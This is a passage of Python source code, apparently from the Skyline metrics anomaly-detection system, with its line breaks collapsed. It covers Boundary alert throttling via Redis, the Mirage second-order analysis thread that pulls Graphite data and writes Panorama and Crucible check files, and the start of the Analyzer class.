str(anomalous_metric)) # Determine how many times has the anomaly been seen if the # ALERT_THRESHOLD is set to > 1 and create a cache key in # redis to keep count so that alert_threshold can be honored if alert_threshold == 0: times_seen = 1 if ENABLE_BOUNDARY_DEBUG: logger.info("debug :: alert_threshold - " + str(alert_threshold)) if alert_threshold == 1: times_seen = 1 if ENABLE_BOUNDARY_DEBUG: logger.info("debug :: alert_threshold - " + str(alert_threshold)) if alert_threshold > 1: if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: alert_threshold - ' + str(alert_threshold)) anomaly_cache_key_count_set = False anomaly_cache_key_expiration_time = (int(alert_threshold) + 1) * 60 anomaly_cache_key = 'anomaly_seen.%s.%s' % (algorithm, base_name) try: anomaly_cache_key_count = self.redis_conn.get(anomaly_cache_key) if not anomaly_cache_key_count: try: if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: redis no anomaly_cache_key - ' + str(anomaly_cache_key)) times_seen = 1 if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: redis setex anomaly_cache_key - ' + str(anomaly_cache_key)) self.redis_conn.setex(anomaly_cache_key, anomaly_cache_key_expiration_time, packb(int(times_seen))) logger.info('set anomaly seen key :: %s seen %s' % (anomaly_cache_key, str(times_seen))) except Exception as e: logger.error('error :: redis setex failed :: %s' % str(anomaly_cache_key)) logger.error('error :: could not set key: %s' % e) else: if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: redis anomaly_cache_key retrieved OK - ' + str(anomaly_cache_key)) anomaly_cache_key_count_set = True except: if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: redis failed - anomaly_cache_key retrieval failed - ' + str(anomaly_cache_key)) anomaly_cache_key_count_set = False if anomaly_cache_key_count_set: unpacker = Unpacker(use_list=False) unpacker.feed(anomaly_cache_key_count) raw_times_seen = list(unpacker) times_seen = int(raw_times_seen[0]) + 1 try: self.redis_conn.setex(anomaly_cache_key, anomaly_cache_key_expiration_time, packb(int(times_seen))) logger.info('error :: set anomaly seen key :: %s seen %s' % (anomaly_cache_key, str(times_seen))) except: times_seen = 1 logger.error('error :: set anomaly seen key failed :: %s seen %s' % (anomaly_cache_key, str(times_seen))) # Alert the alerters if times_seen > alert_threshold if times_seen >= alert_threshold: if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: times_seen %s is greater than or equal to alert_threshold %s' % (str(times_seen), str(alert_threshold))) for alerter in metric_alerters.split("|"): # Determine alerter limits send_alert = False alerts_sent = 0 if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: checking alerter - %s' % alerter) try: if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: determining alerter_expiration_time for settings') alerter_expiration_time_setting = settings.BOUNDARY_ALERTER_OPTS['alerter_expiration_time'][alerter] alerter_expiration_time = int(alerter_expiration_time_setting) if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: determined alerter_expiration_time from settings - %s' % str(alerter_expiration_time)) except: # Set an arbitrary expiry time if not set alerter_expiration_time = 160 if ENABLE_BOUNDARY_DEBUG: logger.info("debug :: could not determine alerter_expiration_time from settings") try: if ENABLE_BOUNDARY_DEBUG: logger.info("debug :: determining alerter_limit from settings") alerter_limit_setting = settings.BOUNDARY_ALERTER_OPTS['alerter_limit'][alerter] alerter_limit = int(alerter_limit_setting) alerter_limit_set = True if ENABLE_BOUNDARY_DEBUG: logger.info("debug :: determined alerter_limit from settings - %s" % str(alerter_limit)) except: alerter_limit_set = False send_alert = True if ENABLE_BOUNDARY_DEBUG: logger.info("debug :: could not determine alerter_limit from settings") # If the alerter_limit is set determine how many # alerts the alerter has sent if alerter_limit_set: alerter_sent_count_key = 'alerts_sent.%s' % (alerter) try: alerter_sent_count_key_data = self.redis_conn.get(alerter_sent_count_key) if not alerter_sent_count_key_data: if ENABLE_BOUNDARY_DEBUG: logger.info("debug :: redis no alerter key, no alerts sent for - " + str(alerter_sent_count_key)) alerts_sent = 0 send_alert = True if ENABLE_BOUNDARY_DEBUG: logger.info("debug :: alerts_sent set to %s" % str(alerts_sent)) logger.info("debug :: send_alert set to %s" % str(sent_alert)) else: if ENABLE_BOUNDARY_DEBUG: logger.info("debug :: redis alerter key retrieved, unpacking" + str(alerter_sent_count_key)) unpacker = Unpacker(use_list=False) unpacker.feed(alerter_sent_count_key_data) raw_alerts_sent = list(unpacker) alerts_sent = int(raw_alerts_sent[0]) if ENABLE_BOUNDARY_DEBUG: logger.info("debug :: alerter %s alerts sent %s " % (str(alerter), str(alerts_sent))) except: logger.info("No key set - %s" % alerter_sent_count_key) alerts_sent = 0 send_alert = True if ENABLE_BOUNDARY_DEBUG: logger.info("debug :: alerts_sent set to %s" % str(alerts_sent)) logger.info("debug :: send_alert set to %s" % str(send_alert)) if alerts_sent < alerter_limit: send_alert = True if ENABLE_BOUNDARY_DEBUG: logger.info("debug :: alerts_sent %s is less than alerter_limit %s" % (str(alerts_sent), str(alerter_limit))) logger.info("debug :: send_alert set to %s" % str(send_alert)) # Send alert alerter_alert_sent = False if send_alert: cache_key = 'last_alert.boundary.%s.%s.%s' % (alerter, base_name, algorithm) if ENABLE_BOUNDARY_DEBUG: logger.info("debug :: checking cache_key - %s" % cache_key) try: last_alert = self.redis_conn.get(cache_key) if not last_alert: try: self.redis_conn.setex(cache_key, int(anomalous_metric[2]), packb(int(anomalous_metric[0]))) if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: key setex OK - %s' % (cache_key)) trigger_alert(alerter, datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via %s - %s' % (base_name, datapoint, alerter, algorithm)) trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm)) alerter_alert_sent = True except Exception as e: logger.error('error :: alert failed :: %s - %s - via %s - %s' % (base_name, datapoint, alerter, algorithm)) logger.error('error :: could not send alert: %s' % str(e)) trigger_alert('syslog', datapoint, base_name, expiration_time, metric_trigger, algorithm) else: if ENABLE_BOUNDARY_DEBUG: logger.info("debug :: cache_key exists not alerting via %s for %s is less than alerter_limit %s" % (alerter, cache_key)) trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm)) except: trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm)) else: trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm)) # Update the alerts sent for the alerter cache key, # to allow for alert limiting if alerter_alert_sent and alerter_limit_set: try: alerter_sent_count_key = 'alerts_sent.%s' % (alerter) new_alerts_sent = int(alerts_sent) + 1 self.redis_conn.setex(alerter_sent_count_key, alerter_expiration_time, packb(int(new_alerts_sent))) logger.info('set %s - %s' % (alerter_sent_count_key, str(new_alerts_sent))) except: logger.error('error :: failed to set %s - %s' % (alerter_sent_count_key, str(new_alerts_sent))) else: # Always alert to syslog, even if alert_threshold is not # breached or if send_alert is not True trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm)) # Write anomalous_metrics to static webapp directory if len(self.anomalous_metrics) > 0: filename = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP)) with open(filename, 'w') as fh: # Make it JSONP with a handle_data() function anomalous_metrics = list(self.anomalous_metrics) anomalous_metrics.sort(key=operator.itemgetter(1)) fh.write('handle_data(%s)' % anomalous_metrics) run_time = time() - now total_metrics = str(len(boundary_metrics)) total_analyzed = str(len(boundary_metrics) - sum(exceptions.values())) total_anomalies = str(len(self.anomalous_metrics)) # Log progress logger.info('seconds to run :: %.2f' % run_time) logger.info('total metrics :: %s' % total_metrics) logger.info('total analyzed :: %s' % total_analyzed) logger.info('total anomalies :: %s' % total_anomalies) logger.info('exception stats :: %s' % exceptions) logger.info('anomaly breakdown :: %s' % anomaly_breakdown) # Log to Graphite graphite_run_time = '%.2f' % run_time send_metric_name = skyline_app_graphite_namespace + '.run_time' send_graphite_metric(skyline_app, send_metric_name, graphite_run_time) send_metric_name = skyline_app_graphite_namespace + '.total_analyzed' send_graphite_metric(skyline_app, send_metric_name, total_analyzed) send_metric_name = skyline_app_graphite_namespace + '.total_anomalies' send_graphite_metric(skyline_app, send_metric_name, total_anomalies) send_metric_name = skyline_app_graphite_namespace + '.total_metrics' send_graphite_metric(skyline_app, send_metric_name, total_metrics) for key, value in exceptions.items(): send_metric_name = '%s.exceptions.%s' % (skyline_app_graphite_namespace, key) send_graphite_metric(skyline_app, send_metric_name, str(value)) for key, value in anomaly_breakdown.items(): send_metric_name = '%s.anomaly_breakdown.%s' % (skyline_app_graphite_namespace, key) send_graphite_metric(skyline_app, send_metric_name, str(value)) # Check canary metric raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC) if raw_series is not None: unpacker = Unpacker(use_list=False) unpacker.feed(raw_series) timeseries = list(unpacker) time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600 projected = 24 * (time() - now) / time_human logger.info('canary duration :: %.2f' % time_human) send_metric_name = skyline_app_graphite_namespace + '.duration' send_graphite_metric(skyline_app, send_metric_name, str(time_human)) send_metric_name = skyline_app_graphite_namespace + '.projected' send_graphite_metric(skyline_app, send_metric_name, str(projected)) # Reset counters self.anomalous_metrics[:] = [] # Only run once per process_runtime = time() - now try: boundary_optimum_run_duration = settings.BOUNDARY_OPTIMUM_RUN_DURATION except: boundary_optimum_run_duration = 60 if process_runtime < boundary_optimum_run_duration: sleep_for = (boundary_optimum_run_duration - process_runtime) logger.info('sleeping %.2f for seconds' % sleep_for) sleep(sleep_for)
class Mirage(Thread): def __init__(self, parent_pid): """ Initialize the Mirage """ super(Mirage, self).__init__() self.daemon = True self.parent_pid = parent_pid self.current_pid = getpid() self.anomalous_metrics = Manager().list() self.mirage_exceptions_q = Queue() self.mirage_anomaly_breakdown_q = Queue() self.not_anomalous_metrics = Manager().list() self.metric_variables = Manager().list() def check_if_parent_is_alive(self): """ Self explanatory """ try: kill(self.current_pid, 0) kill(self.parent_pid, 0) except: exit(0) def mkdir_p(self, path): try: os.makedirs(path) return True # Python >2.5 except OSError as exc: if exc.errno == errno.EEXIST and os.path.isdir(path): pass else: raise def surface_graphite_metric_data(self, metric_name, graphite_from, graphite_until): # We use absolute time so that if there is a lag in mirage the correct # timeseries data is still surfaced relevant to the anomalous datapoint # timestamp if settings.GRAPHITE_PORT != '': url = '%s://%s:%s/render/?from=%s&until=%s&target=%s&format=json' % ( settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST, str(settings.GRAPHITE_PORT), graphite_from, graphite_until, metric_name) else: url = '%s://%s/render/?from=%s&until=%s&target=%s&format=json' % ( settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST, graphite_from, graphite_until, metric_name) r = requests.get(url) js = r.json() datapoints = js[0]['datapoints'] converted = [] for datapoint in datapoints: try: new_datapoint = [float(datapoint[1]), float(datapoint[0])] converted.append(new_datapoint) except: continue parsed = urlparse.urlparse(url) target = urlparse.parse_qs(parsed.query)['target'][0] metric_data_folder = settings.MIRAGE_DATA_FOLDER + "/" + target self.mkdir_p(metric_data_folder) with open(metric_data_folder + "/" + target + '.json', 'w') as f: f.write(json.dumps(converted)) f.close() return True return False def load_metric_vars(self, filename): if os.path.isfile(filename) == True: f = open(filename) global metric_vars metric_vars = imp.load_source('metric_vars', '', f) f.close() return True return False def spin_process(self, i, run_timestamp): """ Assign a metric for a process to analyze. """ # Discover metric to analyze metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))] # Check if this process is unnecessary if len(metric_var_files) == 0: return metric_var_files_sorted = sorted(metric_var_files) metric_check_file = '%s/%s' % ( settings.MIRAGE_CHECK_PATH, str(metric_var_files_sorted[0])) # Load metric variables self.load_metric_vars(metric_check_file) # Test metric variables if len(metric_vars.metric) == 0: return else: metric = metric_vars.metric metric_name = ['metric_name', metric_vars.metric] self.metric_variables.append(metric_name) if len(metric_vars.value) == 0: return else: metric_value = ['metric_value', metric_vars.value] self.metric_variables.append(metric_value) if len(metric_vars.hours_to_resolve) == 0: return else: hours_to_resolve = ['hours_to_resolve', metric_vars.hours_to_resolve] self.metric_variables.append(hours_to_resolve) if len(metric_vars.metric_timestamp) == 0: return else: metric_timestamp = ['metric_timestamp', metric_vars.metric_timestamp] self.metric_variables.append(metric_timestamp) # Ignore any metric check with a timestamp greater than 10 minutes ago int_metric_timestamp = int(metric_vars.metric_timestamp) int_run_timestamp = int(run_timestamp) metric_timestamp_age = int_run_timestamp - int_metric_timestamp if metric_timestamp_age > settings.MIRAGE_STALE_SECONDS: logger.info('stale check :: %s check request is %s seconds old - discarding' % (metric_vars.metric, metric_timestamp_age)) # Remove metric check file # try: # os.remove(metric_check_file) # except OSError: # pass # return if os.path.exists(metric_check_file): os.remove(metric_check_file) logger.info('removed %s' % (metric_check_file)) else: logger.info('could not remove %s' % (metric_check_file)) # Calculate hours second order resolution to seconds second_order_resolution_seconds = int(metric_vars.hours_to_resolve) * 3600 # Calculate graphite from and until parameters from the metric timestamp graphite_until = datetime.datetime.fromtimestamp(int(metric_vars.metric_timestamp)).strftime('%H:%M_%Y%m%d') int_second_order_resolution_seconds = int(second_order_resolution_seconds) second_resolution_timestamp = int_metric_timestamp - int_second_order_resolution_seconds graphite_from = datetime.datetime.fromtimestamp(int(second_resolution_timestamp)).strftime('%H:%M_%Y%m%d') # Remove any old json file related to the metric metric_json_file = '%s/%s/%s.json' % ( settings.MIRAGE_DATA_FOLDER, str(metric_vars.metric), str(metric_vars.metric)) try: os.remove(metric_json_file) except OSError: pass # Get data from graphite logger.info( 'retrieve data :: surfacing %s timeseries from graphite for %s seconds' % ( metric_vars.metric, second_order_resolution_seconds)) self.surface_graphite_metric_data(metric_vars.metric, graphite_from, graphite_until) # Check there is a json timeseries file to test if not os.path.isfile(metric_json_file): logger.error( 'error :: retrieve failed - failed to surface %s timeseries from graphite' % ( metric_vars.metric)) # Remove metric check file try: os.remove(metric_check_file) except OSError: pass return else: logger.info('retrieved data :: for %s at %s seconds' % ( metric_vars.metric, second_order_resolution_seconds)) # Make process-specific dicts exceptions = defaultdict(int) anomaly_breakdown = defaultdict(int) self.check_if_parent_is_alive() with open((metric_json_file), 'r') as f: timeseries = json.loads(f.read()) logger.info('data points surfaced :: %s' % (len(timeseries))) try: logger.info('analyzing :: %s at %s seconds' % (metric_vars.metric, second_order_resolution_seconds)) anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_vars.metric, second_order_resolution_seconds) # If it's anomalous, add it to list if anomalous: base_name = metric.replace(settings.FULL_NAMESPACE, '', 1) anomalous_metric = [datapoint, base_name] self.anomalous_metrics.append(anomalous_metric) logger.info('anomaly detected :: %s with %s' % (metric_vars.metric, metric_vars.value)) # It runs so fast, this allows us to process 30 anomalies/min sleep(2) # Get the anomaly breakdown - who returned True? triggered_algorithms = [] for index, value in enumerate(ensemble): if value: algorithm = settings.MIRAGE_ALGORITHMS[index] anomaly_breakdown[algorithm] += 1 triggered_algorithms.append(algorithm) # If Crucible or Panorama are enabled determine details determine_anomaly_details = False if settings.ENABLE_CRUCIBLE and settings.MIRAGE_CRUCIBLE_ENABLED: determine_anomaly_details = True if settings.PANORAMA_ENABLED: determine_anomaly_details = True if determine_anomaly_details: metric_timestamp = str(int(timeseries[-1][0])) from_timestamp = str(int(timeseries[1][0])) timeseries_dir = base_name.replace('.', '/') # If Panorama is enabled - create a Panorama check if settings.PANORAMA_ENABLED: if not os.path.exists(settings.PANORAMA_CHECK_PATH): if python_version == 2: mode_arg = int('0755') if python_version == 3: mode_arg = mode=0o755 os.makedirs(settings.PANORAMA_CHECK_PATH, mode_arg) # Note: # The values are enclosed is single quoted intentionally # as the imp.load_source used results in a shift in the # decimal position when double quoted, e.g. # value = "5622.0" gets imported as # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2 # single quoting results in the desired, # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0 added_at = str(int(time())) source = 'graphite' panaroma_anomaly_data = 'metric = \'%s\'\n' \ 'value = \'%s\'\n' \ 'from_timestamp = \'%s\'\n' \ 'metric_timestamp = \'%s\'\n' \ 'algorithms = %s\n' \ 'triggered_algorithms = %s\n' \ 'app = \'%s\'\n' \ 'source = \'%s\'\n' \ 'added_by = \'%s\'\n' \ 'added_at = \'%s\'\n' \ % (base_name, str(datapoint), from_timestamp, metric_timestamp, str(settings.MIRAGE_ALGORITHMS), triggered_algorithms, skyline_app, source, this_host, added_at) # Create an anomaly file with details about the anomaly panaroma_anomaly_file = '%s/%s.%s.txt' % ( settings.PANORAMA_CHECK_PATH, added_at, base_name) try: write_data_to_file( skyline_app, panaroma_anomaly_file, 'w', panaroma_anomaly_data) logger.info('added panorama anomaly file :: %s' % (panaroma_anomaly_file)) except: logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file)) logger.info(traceback.format_exc()) # If crucible is enabled - save timeseries and create a # crucible check if settings.ENABLE_CRUCIBLE and settings.MIRAGE_CRUCIBLE_ENABLED: metric_timestamp = str(int(timeseries[-1][0])) from_timestamp = str(int(timeseries[1][0])) timeseries_dir = base_name.replace('.', '/') crucible_anomaly_dir = settings.CRUCIBLE_DATA_FOLDER + '/' + timeseries_dir + '/' + metric_timestamp if not os.path.exists(crucible_anomaly_dir): if python_version == 2: mode_arg = int('0755') if python_version == 3: mode_arg = mode=0o755 os.makedirs(crucible_anomaly_dir, mode_arg) # Note: # The value is enclosed is single quoted intentionally # as the imp.load_source used in crucible results in a # shift in the decimal position when double quoted, e.g. # value = "5622.0" gets imported as # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2 # single quoting results in the desired, # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0 crucible_anomaly_data = 'metric = \'%s\'\n' \ 'value = \'%s\'\n' \ 'from_timestamp = \'%s\'\n' \ 'metric_timestamp = \'%s\'\n' \ 'algorithms = %s\n' \ 'triggered_algorithms = %s\n' \ 'anomaly_dir = \'%s\'\n' \ 'graphite_metric = True\n' \ 'run_crucible_tests = False\n' \ 'added_by = \'%s\'\n' \ 'added_at = \'%s\'\n' \ % (base_name, str(datapoint), from_timestamp, metric_timestamp, str(settings.MIRAGE_ALGORITHMS), triggered_algorithms, crucible_anomaly_dir, skyline_app, metric_timestamp) # Create an anomaly file with details about the anomaly crucible_anomaly_file = '%s/%s.txt' % (crucible_anomaly_dir, base_name) try: write_data_to_file( skyline_app, crucible_anomaly_file, 'w', crucible_anomaly_data) logger.info('added crucible anomaly file :: %s' % (crucible_anomaly_file)) except: logger.error('error :: failed to add crucible anomaly file :: %s' % (crucible_anomaly_file)) logger.info(traceback.format_exc()) # Create timeseries json file with the timeseries json_file = '%s/%s.json' % (crucible_anomaly_dir, base_name) timeseries_json = str(timeseries).replace('[', '(').replace(']', ')') try: write_data_to_file(skyline_app, json_file, 'w', timeseries_json) logger.info('added crucible timeseries file :: %s' % (json_file)) except: logger.error('error :: failed to add crucible timeseries file :: %s' % (json_file)) logger.info(traceback.format_exc()) # Create a crucible check file crucible_check_file = '%s/%s.%s.txt' % (settings.CRUCIBLE_CHECK_PATH, metric_timestamp, base_name) try: write_data_to_file( skyline_app, crucible_check_file, 'w', crucible_anomaly_data) logger.info('added crucible check :: %s,%s' % (base_name, metric_timestamp)) except: logger.error('error :: failed to add crucible check file :: %s' % (crucible_check_file)) logger.info(traceback.format_exc()) else: base_name = metric.replace(settings.FULL_NAMESPACE, '', 1) not_anomalous_metric = [datapoint, base_name] self.not_anomalous_metrics.append(not_anomalous_metric) logger.info('not anomalous :: %s with %s' % (metric_vars.metric, metric_vars.value)) # It could have been deleted by the Roomba except TypeError: exceptions['DeletedByRoomba'] += 1 logger.info('exceptions :: DeletedByRoomba') except TooShort: exceptions['TooShort'] += 1 logger.info('exceptions :: TooShort') except Stale: exceptions['Stale'] += 1 logger.info('exceptions :: Stale') except Boring: exceptions['Boring'] += 1 logger.info('exceptions :: Boring') except: exceptions['Other'] += 1 logger.info('exceptions :: Other') logger.info(traceback.format_exc()) # Add values to the queue so the parent process can collate for key, value in anomaly_breakdown.items(): self.mirage_anomaly_breakdown_q.put((key, value)) for key, value in exceptions.items(): self.mirage_exceptions_q.put((key, value)) # Remove metric check file try: os.remove(metric_check_file) except OSError: pass def run(self): """ Called when the process intializes. """ # Log management to prevent overwriting # Allow the bin/<skyline_app>.d to manage the log if os.path.isfile(skyline_app_logwait): try: os.remove(skyline_app_logwait) except OSError: logger.error('error - failed to remove %s, continuing' % skyline_app_logwait) pass now = time() log_wait_for = now + 5 while now < log_wait_for: if os.path.isfile(skyline_app_loglock): sleep(.1) now = time() else: now = log_wait_for + 1 logger.info('starting %s run' % skyline_app) if os.path.isfile(skyline_app_loglock): logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app) try: os.remove(skyline_app_loglock) logger.info('log lock file removed') except OSError: logger.error('error - failed to remove %s, continuing' % skyline_app_loglock) pass else: logger.info('bin/%s.d log management done' % skyline_app) while 1: now = time() # Make sure Redis is up try: self.redis_conn.ping() except: logger.info('skyline can not connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH) sleep(10) logger.info('connecting to redis at socket path %s' % settings.REDIS_SOCKET_PATH) self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) continue """ Determine if any metric to analyze """ while True: # Report app up self.redis_conn.setex(skyline_app, 120, now) metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))] if len(metric_var_files) == 0: logger.info('sleeping no metrics...') sleep(10) else: sleep(1) # Clean up old files now_timestamp = time() stale_age = now_timestamp - settings.MIRAGE_STALE_SECONDS for current_file in listdir(settings.MIRAGE_CHECK_PATH): if os.path.isfile(settings.MIRAGE_CHECK_PATH + "/" + current_file): t = os.stat(settings.MIRAGE_CHECK_PATH + "/" + current_file) c = t.st_ctime # delete file if older than a week if c < stale_age: os.remove(settings.MIRAGE_CHECK_PATH + "/" + current_file) logger.info('removed %s' % (current_file)) # Discover metric to analyze metric_var_files = '' metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))] if len(metric_var_files) > 0: break metric_var_files_sorted = sorted(metric_var_files) metric_check_file = settings.MIRAGE_CHECK_PATH + "/" + metric_var_files_sorted[0] logger.info('processing %s' % metric_var_files_sorted[0]) # Remove any existing algorithm.error files from any previous runs # that did not cleanup for any reason pattern = '%s.*.algorithm.error' % skyline_app try: for f in os.listdir(settings.SKYLINE_TMP_DIR): if re.search(pattern, f): try: os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f)) logger.info('cleaning up old error file - %s' % (str(f))) except OSError: pass except: logger.error('failed to cleanup mirage_algorithm.error files - %s' % (traceback.format_exc())) # Spawn processes pids = [] spawned_pids = [] pid_count = 0 MIRAGE_PROCESSES = 1 run_timestamp = int(now) for i in range(1, MIRAGE_PROCESSES + 1): p = Process(target=self.spin_process, args=(i, run_timestamp)) pids.append(p) pid_count += 1 logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(MIRAGE_PROCESSES))) p.start() spawned_pids.append(p.pid) # Send wait signal to zombie processes # for p in pids: # p.join() # Self monitor processes and terminate if any spin_process has run # for longer than 180 seconds - 20160512 @earthgecko p_starts = time() while time() - p_starts <= settings.MAX_ANALYZER_PROCESS_RUNTIME: if any(p.is_alive() for p in pids): # Just to avoid hogging the CPU sleep(.1) else: # All the processes are done, break now. time_to_run = time() - p_starts logger.info('%s :: %s spin_process/es completed in %.2f seconds' % ( skyline_app, str(MIRAGE_PROCESSES), time_to_run)) break else: # We only enter this if we didn't 'break' above. logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app)) for p in pids: p.terminate() p.join() # Log the last reported error by any algorithms that errored in the # spawned processes from algorithms.py for completed_pid in spawned_pids: logger.info('spin_process with pid %s completed' % (str(completed_pid))) for algorithm in settings.MIRAGE_ALGORITHMS: algorithm_error_file = '%s/%s.%s.%s.algorithm.error' % ( settings.SKYLINE_TMP_DIR, skyline_app, str(completed_pid), algorithm) if os.path.isfile(algorithm_error_file): logger.info( 'error - spin_process with pid %s has reported an error with the %s algorithm' % ( str(completed_pid), algorithm)) try: with open(algorithm_error_file, 'r') as f: error_string = f.read() logger.error('%s' % str(error_string)) except: logger.error('failed to read %s error file' % algorithm) try: os.remove(algorithm_error_file) except OSError: pass # Grab data from the queue and populate dictionaries exceptions = dict() anomaly_breakdown = dict() while 1: try: key, value = self.mirage_anomaly_breakdown_q.get_nowait() if key not in anomaly_breakdown.keys(): anomaly_breakdown[key] = value else: anomaly_breakdown[key] += value except Empty: break while 1: try: key, value = self.mirage_exceptions_q.get_nowait() if key not in exceptions.keys(): exceptions[key] = value else: exceptions[key] += value except Empty: break for metric_variable in self.metric_variables: if metric_variable[0] == 'metric_name': metric_name = metric_variable[1] if metric_variable[0] == 'metric_value': metric_value = metric_variable[1] if metric_variable[0] == 'hours_to_resolve': hours_to_resolve = metric_variable[1] if metric_variable[0] == 'metric_timestamp': metric_timestamp = metric_variable[1] logger.info('analysis done - %s' % metric_name) # Send alerts # Calculate hours second order resolution to seconds logger.info('analyzed at %s hours resolution' % hours_to_resolve) second_order_resolution_seconds = int(hours_to_resolve) * 3600 logger.info('analyzed at %s seconds resolution' % second_order_resolution_seconds) if settings.MIRAGE_ENABLE_ALERTS: for alert in settings.ALERTS: for metric in self.anomalous_metrics: ALERT_MATCH_PATTERN = alert[0] METRIC_PATTERN = metric[1] alert_match_pattern = re.compile(ALERT_MATCH_PATTERN) pattern_match = alert_match_pattern.match(METRIC_PATTERN) if pattern_match: cache_key = 'mirage.last_alert.%s.%s' % (alert[1], metric[1]) try: last_alert = self.redis_conn.get(cache_key) if not last_alert: self.redis_conn.setex(cache_key, alert[2], packb(metric[0])) trigger_alert(alert, metric, second_order_resolution_seconds) logger.info('sent %s alert: For %s' % (alert[1], metric[1])) except Exception as e: logger.error('error :: could not send %s alert for %s: %s' % (alert[1], metric[1], e)) if settings.NEGATE_ANALYZER_ALERTS: if len(self.anomalous_metrics) == 0: for negate_alert in settings.ALERTS: for not_anomalous_metric in self.not_anomalous_metrics: NEGATE_ALERT_MATCH_PATTERN = negate_alert[0] NOT_ANOMALOUS_METRIC_PATTERN = not_anomalous_metric[1] alert_match_pattern = re.compile(NEGATE_ALERT_MATCH_PATTERN) negate_pattern_match = alert_match_pattern.match(NOT_ANOMALOUS_METRIC_PATTERN) if negate_pattern_match: try: logger.info('negate alert sent: For %s' % (not_anomalous_metric[1])) trigger_negater(negate_alert, not_anomalous_metric, second_order_resolution_seconds, metric_value) except Exception as e: logger.error('error :: could not send alert: %s' % e) # Log progress if len(self.anomalous_metrics) > 0: logger.info('seconds since last anomaly :: %.2f' % (time() - now)) logger.info('total anomalies :: %d' % len(self.anomalous_metrics)) logger.info('exception stats :: %s' % exceptions) logger.info('anomaly breakdown :: %s' % anomaly_breakdown) # Reset counters self.anomalous_metrics[:] = [] self.not_anomalous_metrics[:] = [] # Reset metric_variables self.metric_variables[:] = [] # Sleep if it went too fast if time() - now < 1: logger.info('sleeping due to low run time...') # sleep(10) sleep(1)
class Analyzer(Thread): """ The Analyzer class which controls the analyzer thread and spawned processes. """ def __init__(self, parent_pid): """ Initialize the Analyzer Create the :obj:`self.anomalous_metrics` list Create the :obj:`self.exceptions_q` queue Create the :obj:`self.anomaly_breakdown_q` queue """ super(Analyzer, self).__init__() # @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow if settings.REDIS_PASSWORD: self.redis_conn = StrictRedis( password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH) else: self.redis_conn = StrictRedis( unix_socket_path=settings.REDIS_SOCKET_PATH) self.daemon = True self.parent_pid = parent_pid self.current_pid = getpid() self.anomalous_metrics = Manager().list() self.exceptions_q = Queue() self.anomaly_breakdown_q = Queue() self.mirage_metrics = Manager().list() def check_if_parent_is_alive(self): """ Self explanatory """ try: kill(self.current_pid, 0) kill(self.parent_pid, 0) except: exit(0) def send_graphite_metric(self, name, value): """ Sends the skyline_app metrics to the `GRAPHITE_HOST` if a graphite host is defined. """ if settings.GRAPHITE_HOST != '': skyline_app_metric = skyline_app_graphite_namespace + name sock = socket.socket() sock.settimeout(10) # Handle connection error to Graphite #116 @etsy # Fixed as per https://github.com/etsy/skyline/pull/116 and # mlowicki:etsy_handle_connection_error_to_graphite # Handle connection error to Graphite #7 @ earthgecko # merged 1 commit into earthgecko:master from # mlowicki:handle_connection_error_to_graphite on 16 Mar 2015 try: sock.connect((settings.GRAPHITE_HOST, settings.CARBON_PORT)) sock.settimeout(None) except socket.error: sock.settimeout(None) endpoint = '%s:%d' % (settings.CARBON_HOST, settings.CARBON_PORT) logger.error("Can't connect to Graphite at %s" % endpoint) return False # For the same reason as above # sock.sendall('%s %s %i\n' % (name, value, time())) try: sock.sendall('%s %s %i\n' % (skyline_app_metric, value, time())) sock.close() return True except: endpoint = '%s:%d' % (settings.GRAPHITE_HOST, settings.CARBON_PORT) logger.error("Can't connect to Graphite at %s" % endpoint) return False return False def spin_process(self, i, unique_metrics): """ Assign a bunch of metrics for a process to analyze. Multiple get the assigned_metrics to the process from Redis. For each metric:\n * unpack the `raw_timeseries` for the metric.\n * Analyse each timeseries against `ALGORITHMS` to determine if it is\n anomalous.\n * If 